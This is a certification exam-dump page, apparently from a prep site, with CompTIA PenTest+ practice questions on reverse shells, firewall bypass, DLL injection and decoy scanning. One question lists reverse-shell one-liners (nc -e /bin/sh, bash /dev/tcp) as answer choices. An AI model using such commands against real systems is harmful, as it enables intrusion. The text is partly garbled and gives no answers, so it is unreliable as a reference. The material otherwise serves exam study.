PT0-001 Exam Details

  • Exam Code
    :PT0-001
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :306 Q&As
  • Last Updated
    :Apr 01, 2024

CompTIA PT0-001 Online Questions & Answers

  • Question 241:

    A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)

    A. Tcpdump
    B. Nmap
    C. Wiresrtark
    D. SSH
    E. Netcat
    F. Cain and Abel

  • Question 242:

    A company has engaged a penetration tester to perform an assessment for an application that resides in the company's DMZ. Prior to conducting testing, in which of the following solutions should the penetration tester's IP address be whitelisted?

    A. WAF
    B. HIDS
    C. NIDS
    D. DLP

  • Question 243:

    A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

    A. perl -e ` use SOCKET'; $i='; $p='443;
    B. ssh superadmin@ -p 443
    C. nc -e /bin/sh 443
    D. bash -i >and /dev/tcp// 443 0>and1

  • Question 244:

    Joe, a penetration tester, was able to exploit a web application behind a firewall He is trying to get a reverse shell back to his machine but the firewall blocks the outgoing traffic Ports for which of the following should the security consultant use to have the HIGHEST chance to bypass the firewall?

    A. HTTP
    B. SMTP
    C. FTP
    D. DNS

  • Question 245:

    HOTSPOT

    You are a security analyst tasked with hardening a web server.

    You have been given a list of HTTP payloads that were flagged as malicious.

    Hot Area:

  • Question 246:

    A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

    A. Attempt to crack the service account passwords.
    B. Attempt DLL hijacking attacks.
    C. Attempt to locate weak file and folder permissions.
    D. Attempt privilege escalation attacks.

  • Question 247:

    A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would defined the target list?

    A. Rules of engagement
    B. Master services agreement
    C. Statement of work
    D. End-user license agreement

  • Question 248:

    A penetration tester identifies prebuilt exploit code containing Windows imports for VirtualAllocEx and LoadLibraryA functions. Which of the following techniques is the exploit code using?

    A. DLL hijacking
    B. DLL sideloading
    C. DLL injection
    D. DLL function hooking

  • Question 249:

    A penetration tester calls human resources and begins asking open-ended questions Which of the following social engineering techniques is the penetration tester using?

    A. Interrogation
    B. Elicitation
    C. Impersonation
    D. Spear phishing

  • Question 250:

    A penetration tester is perform initial intelligence gathering on some remote hosts prior to conducting a vulnerability < The tester runs the following command nmap -D 192.168.1.1,192.168.1.2,192.168.1.3 -sV -o --max rate 2 192. 168.130 Which ol the following BEST describes why multiple IP addresses are specified?

    A. The network is submitted as a /25 or greater and the tester needed to access hosts on two different subnets
    B. The tester is trying to perform a more stealthy scan by including several bogus addresses
    C. The scanning machine has several interfaces to balance the scan request across at the specified rate
    D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.